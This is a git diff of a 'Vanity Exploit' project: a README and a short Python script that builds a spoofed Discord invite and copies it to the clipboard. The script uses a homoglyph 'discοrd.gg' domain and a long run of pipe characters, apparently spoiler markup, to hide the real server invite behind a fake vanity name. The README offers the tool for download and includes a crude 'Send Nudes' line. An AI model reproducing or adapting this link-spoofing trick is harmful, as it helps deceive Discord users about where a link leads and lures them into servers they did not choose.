diff --git a/README.md b/README.md
index 1b39ad9..ecd982c 100644
--- a/README.md
+++ b/README.md
@@ -5,12 +5,12 @@ Vanity Exploit Spoofs A Discord Vanity Link
[Download the repo](https://gitdab.com/12/Vanity-Exploit) & Run Install.bat
# Previews
-
-
-
+
+
+
# Discord
Syz#0001 Send Nudes
# Credit
-Credit to [Fweak](https://gitdab.com/Fweak1337) For Finding This Exploit
+Credit to [Rezizt](https://github.com/REZIZT1337) For Finding This Exploit
diff --git a/Vanity-Exploit.py b/Vanity-Exploit.py
index 77b0b1b..a39c60c 100644
--- a/Vanity-Exploit.py
+++ b/Vanity-Exploit.py
@@ -13,13 +13,13 @@ intro = """
print(intro)
-server = input("Server Invite:")
-invite = input("New Invite Name:")
+server = input("Server invite:")
+invite = input("new invite name:")
vanity = "discοrd.gg/" + invite + "||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||" + server
clipboard.copy(vanity)
-print('Copied to Clipboard!\nPress Any Key to Exit')
+print('Copied to clipboard!')
input()
-print()
\ No newline at end of file
+print()